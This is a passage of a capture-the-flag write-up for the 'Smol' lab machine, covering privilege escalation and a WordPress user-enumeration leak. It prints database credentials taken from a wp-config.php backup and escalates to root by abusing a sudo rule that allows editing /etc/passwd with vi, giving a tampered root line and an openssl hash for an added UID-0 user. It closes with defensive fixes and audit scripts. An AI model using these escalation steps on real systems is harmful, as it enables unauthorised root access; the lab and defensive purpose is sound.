  inflating: wordpress.old/wp-admin/users.php  
  inflating: wordpress.old/wp-admin/options-media.php  
  inflating: wordpress.old/wp-admin/edit.php  
  inflating: wordpress.old/wp-admin/import.php  
  inflating: wordpress.old/wp-admin/revision.php

Searching through it turns up a sensitive configuration file:

┌──(kali💀kali)-[~/temp/Smol]
└─$ cd wordpress.old 

┌──(kali💀kali)-[~/temp/Smol/wordpress.old]
└─$ ll
total 228
-rw-r--r--  1 kali kali   405 Aug 16  2023 index.php
-rw-r--r--  1 kali kali 19915 Aug 16  2023 license.txt
-rw-r--r--  1 kali kali  7399 Aug 16  2023 readme.html
-rw-r--r--  1 kali kali  7211 Aug 16  2023 wp-activate.php
drwxr-xr-x  9 kali kali  4096 Aug 16  2023 wp-admin
-rw-r--r--  1 kali kali   351 Aug 16  2023 wp-blog-header.php
-rw-r--r--  1 kali kali  2323 Aug 16  2023 wp-comments-post.php
-rw-r--r--  1 kali kali  2994 Aug 16  2023 wp-config.php
drwxr-xr-x  7 kali kali  4096 Aug 16  2023 wp-content
-rw-r--r--  1 kali kali  5638 Aug 16  2023 wp-cron.php
drwxr-xr-x 27 kali kali 12288 Aug 16  2023 wp-includes
-rw-r--r--  1 kali kali  2502 Aug 16  2023 wp-links-opml.php
-rw-r--r--  1 kali kali  3927 Aug 16  2023 wp-load.php
-rw-r--r--  1 kali kali 49441 Aug 16  2023 wp-login.php
-rw-r--r--  1 kali kali  8537 Aug 16  2023 wp-mail.php
-rw-r--r--  1 kali kali 25602 Aug 16  2023 wp-settings.php
-rw-r--r--  1 kali kali 34385 Aug 16  2023 wp-signup.php
-rw-r--r--  1 kali kali  4885 Aug 16  2023 wp-trackback.php
-rw-r--r--  1 kali kali  3236 Aug 16  2023 xmlrpc.php

┌──(kali💀kali)-[~/temp/Smol/wordpress.old]
└─$ cat wp-config.php 
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the web site, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * Database settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/documentation/article/editing-wp-config-php/
 *
 * @package WordPress
 */

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** Database username */
define( 'DB_USER', 'xavi' );

/** Database password */
define( 'DB_PASSWORD', 'P@ssw0rdxavi@' );

/** Database hostname */
define( 'DB_HOST', 'localhost' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication unique keys and salts.
 *
 * Change these to different unique phrases! You can generate these using
 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
 *
 * You can change these at any point in time to invalidate all existing cookies.
 * This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         'put your unique phrase here' );
define( 'SECURE_AUTH_KEY',  'put your unique phrase here' );
define( 'LOGGED_IN_KEY',    'put your unique phrase here' );
define( 'NONCE_KEY',        'put your unique phrase here' );
define( 'AUTH_SALT',        'put your unique phrase here' );
define( 'SECURE_AUTH_SALT', 'put your unique phrase here' );
define( 'LOGGED_IN_SALT',   'put your unique phrase here' );
define( 'NONCE_SALT',       'put your unique phrase here' );

/**#@-*/

/**
 * WordPress database table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://wordpress.org/documentation/article/debugging-in-wordpress/
 */
define( 'WP_DEBUG', true );

/* Add any custom values between this line and the "stop editing" line. */

/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
        define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';

This yields new credentials:

xavi
P@ssw0rdxavi@

Switch user:

image-20250607152548920

Editing /etc/passwd to get a root shell

xavi@smol:~$ sudo -l
[sudo] password for xavi: 
Matching Defaults entries for xavi on smol:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User xavi may run the following commands on smol:
    (ALL : ALL) /usr/bin/vi /etc/passwd

xavi can edit /etc/passwd through sudo, so we can either add a privileged user with a known password hash, or simply use vi's command mode to spawn a shell:

vi command mode

image-20250607152846462

image-20250607152902834

Adding a privileged user

Adding a user with root privileges works just as well, and I suspect it is what the author intended; alternatively, blank out root's password: root::0:0:root:/root:/usr/bin/bash

┌──(kali💀kali)-[~/temp/Smol/wordpress.old]
└─$ openssl passwd -1 -salt kali kali  
$1$kali$/rLA3oVIdYGokOY9m1jKj.

image-20250607153442406
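Both edits leave a footprint that is easy to check for, so here is an added Python audit (not from the page's author) that a defender would run against /etc/passwd: it flags an empty password field, a hash stored in passwd instead of shadow, duplicate UID 0 accounts, and malformed lines. The sample file is constructed; it mixes stock entries with the two tampered lines discussed above, reusing the hash produced by the `openssl passwd` command.

```python
# Constructed sample /etc/passwd: stock entries plus the two kinds of
# tampering discussed above (blanked root password; an extra UID-0 account
# carrying the hash from `openssl passwd -1 -salt kali kali`).
SAMPLE_PASSWD = """\
root::0:0:root:/root:/usr/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
think:x:1000:1000::/home/think:/bin/bash
xavi:x:1003:1003::/home/xavi:/bin/bash
kali:$1$kali$/rLA3oVIdYGokOY9m1jKj.:0:0:root:/root:/bin/bash
"""

# Values that legitimately appear in the password field: 'x' defers to
# /etc/shadow, the others mark a locked account.
_SHADOWED_OR_LOCKED = {'x', '*', '!', '!!', '*NP*'}


def parse_passwd(text: str) -> list:
    """Split passwd lines into dicts; malformed lines are kept with an 'error' key."""
    rows = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith('#'):
            continue
        fields = line.split(':')
        if len(fields) != 7:
            rows.append({'line': n, 'name': line, 'error': 'malformed entry'})
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        rows.append({
            'line': n, 'name': name, 'pw': pw,
            'uid': int(uid) if uid.isdigit() else None,
            'gid': int(gid) if gid.isdigit() else None,
            'home': home, 'shell': shell,
        })
    return rows


def audit_passwd(text: str) -> list:
    """Return (line, account, problem) tuples for every suspicious entry."""
    findings = []
    for r in parse_passwd(text):
        if 'error' in r:
            findings.append((r['line'], r['name'], r['error']))
            continue
        if r['pw'] == '':
            findings.append((r['line'], r['name'], 'empty password field: no password required'))
        elif r['pw'] not in _SHADOWED_OR_LOCKED:
            findings.append((r['line'], r['name'], 'password hash stored in /etc/passwd instead of /etc/shadow'))
        if r['uid'] is None:
            findings.append((r['line'], r['name'], 'non-numeric UID'))
        elif r['uid'] == 0 and r['name'] != 'root':
            findings.append((r['line'], r['name'], 'extra UID 0 account'))
    return findings


if __name__ == '__main__':
    for line, name, problem in audit_passwd(SAMPLE_PASSWD):
        print(f'line {line} ({name}): {problem}')
```

The sudo rule itself (`(ALL : ALL) /usr/bin/vi /etc/passwd`) is the root cause: any interactive editor granted through sudo can spawn a shell, and `visudo`/`vipw` exist precisely so that these files are never handed to a general-purpose editor under sudo.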

root@smol:/home/xavi$ cd ~
root@smol:~$ ls -la
total 64K
drwx------  7 root root 4.0K Jun  7 07:34 .
drwxr-xr-x 18 root root 4.0K Mar 29  2024 ..
lrwxrwxrwx  1 root root    9 Jun  2  2023 .bash_history -> /dev/null
-rw-r--r--  1 root root 3.2K Jun 21  2023 .bashrc
drwx------  2 root root 4.0K Jun  2  2023 .cache
-rw-------  1 root root   35 Mar 29  2024 .lesshst
drwxr-xr-x  3 root root 4.0K Jun 21  2023 .local
lrwxrwxrwx  1 root root    9 Aug 18  2023 .mysql_history -> /dev/null
drwxr-xr-x  4 root root 4.0K Aug 16  2023 .phpbrew
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
-rw-r-----  1 root root   33 Aug 16  2023 root.txt
-rw-r--r--  1 root root   75 Aug 17  2023 .selected_editor
drwx------  3 root root 4.0K Jun 21  2023 snap
drwx------  2 root root 4.0K Jun  2  2023 .ssh
-rw-rw-rw-  1 root root  13K Jun  7 07:34 .viminfo
root@smol:~$ cat root.txt 
bf89ea3ea01992353aef1f576214d4e4

Other attempts

I suddenly remembered that the group admin had mentioned an information leak in WordPress:

┌──(kali💀kali)-[~/temp/Smol]
└─$ curl -s http://www.smol.hmv/index.php/wp-json/WP/V2/users/1 | jq
{
  "id": 1,
  "name": "admin",
  "url": "http://www.smol.hmv",
  "description": "",
  "link": "http://www.smol.hmv/index.php/author/admin/",
  "slug": "admin",
  "avatar_urls": {
    "24": "https://secure.gravatar.com/avatar/34704205919a3055db6e4930c4ea2180b94c3d103f12fa572b51c1a632676d33?s=24&d=monsterid&r=g",
    "48": "https://secure.gravatar.com/avatar/34704205919a3055db6e4930c4ea2180b94c3d103f12fa572b51c1a632676d33?s=48&d=monsterid&r=g",
    "96": "https://secure.gravatar.com/avatar/34704205919a3055db6e4930c4ea2180b94c3d103f12fa572b51c1a632676d33?s=96&d=monsterid&r=g"
  },
  "meta": [],
  "_links": {
    "self": [
      {
        "href": "http://www.smol.hmv/index.php/wp-json/wp/v2/users/1",
        "targetHints": {
          "allow": [
            "GET"
          ]
        }
      }
    ],
    "collection": [
      {
        "href": "http://www.smol.hmv/index.php/wp-json/wp/v2/users"
      }
    ]
  }
}

Access to this endpoint needs to be restricted to prevent the leak...

Reference: https://www.wpcom.cn/tutorial/301.html

server {
    location ~ ^/wp-json/wp/v2/users(/.*)?$ {
        deny all;
        return 403;
    }
}

/**
 * Disable the WordPress user enumeration endpoint; only users with editor
 * privileges or above may access it.
 *
 * @author WPCOM
 * @version 1.0.0
 * @since 2024-12-26
 */
add_filter('rest_endpoints', function ($endpoints) {
    global $has_users_endpoint;
    if($has_users_endpoint) return $endpoints;

    if(isset($endpoints['/wp/v2/users'])){
        $users_endpoint = $endpoints['/wp/v2/users'];
        unset($endpoints['/wp/v2/users']);
    }

    // Editors and above may see the user list
    if (defined('REST_REQUEST') && REST_REQUEST && current_user_can('editor')) {
        // Restore the /wp/v2/users endpoint
        if(isset($users_endpoint)) $endpoints['/wp/v2/users'] = $users_endpoint;
        $has_users_endpoint = true;
    }

    return $endpoints;
});
# functions.php
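After applying either fix, verify it from the outside; the added Python checker below is not part of the reference or the writeup. It matters which paths are tested: the nginx `location` rule above matches only the pretty-permalink path, while WordPress also serves the REST API through the `rest_route` query parameter (and, on this box, under `/index.php/wp-json/`), so the PHP `rest_endpoints` filter is the more complete fix and the check covers all three. The response bodies are constructed (the leaking one is modelled on the `users/1` object shown above); `check_site` needs network access and takes the site's base URL as an assumed argument.

```python
import json
import urllib.error
import urllib.request

# Constructed sample bodies: a leaking collection (shaped like the users/1
# object above) and a generic REST error body.
LEAKING_BODY = json.dumps([{
    "id": 1, "name": "admin", "slug": "admin",
    "link": "http://www.smol.hmv/index.php/author/admin/",
}])
BLOCKED_BODY = json.dumps({"code": "rest_forbidden",
                           "message": "Sorry, you are not allowed to do that.",
                           "data": {"status": 401}})

# Every way the users collection is normally reachable.
USER_PATHS = (
    '/wp-json/wp/v2/users',
    '/index.php/wp-json/wp/v2/users',
    '/?rest_route=/wp/v2/users',
)


def classify_users_response(status: int, body: str) -> dict:
    """Decide whether a /wp/v2/users response discloses account names (slugs)."""
    if status == 0:
        return {'leaks': False, 'reason': 'unreachable', 'slugs': []}
    if status in (401, 403):
        return {'leaks': False, 'reason': 'access denied', 'slugs': []}
    if status == 404:
        return {'leaks': False, 'reason': 'endpoint removed', 'slugs': []}
    if status != 200:
        return {'leaks': False, 'reason': f'http {status}', 'slugs': []}
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return {'leaks': False, 'reason': 'non-JSON body', 'slugs': []}
    items = data if isinstance(data, list) else [data]
    slugs = [u['slug'] for u in items if isinstance(u, dict) and 'slug' in u]
    return {'leaks': bool(slugs),
            'reason': 'user objects returned' if slugs else 'no user objects',
            'slugs': slugs}


def fetch(url: str, timeout: float = 10.0) -> tuple:
    """GET `url` anonymously; return (status, body), status 0 if unreachable."""
    req = urllib.request.Request(url, headers={'User-Agent': 'users-endpoint-check'})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode('utf-8', 'replace')
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode('utf-8', 'replace')
    except urllib.error.URLError:
        return 0, ''


def check_site(base_url: str) -> dict:
    """Classify each users-collection path for an unauthenticated client."""
    base = base_url.rstrip('/')
    return {path: classify_users_response(*fetch(base + path)) for path in USER_PATHS}


if __name__ == '__main__':
    import sys
    for path, verdict in check_site(sys.argv[1]).items():
        state = 'LEAK' if verdict['leaks'] else 'ok'
        print(f"{state:4} {path}: {verdict['reason']} {verdict['slugs']}")
```

The fix is sufficient only when all three paths come back as denied or removed; a `LEAK` on the `rest_route` path with the others blocked is the typical sign that only the web-server rule was applied.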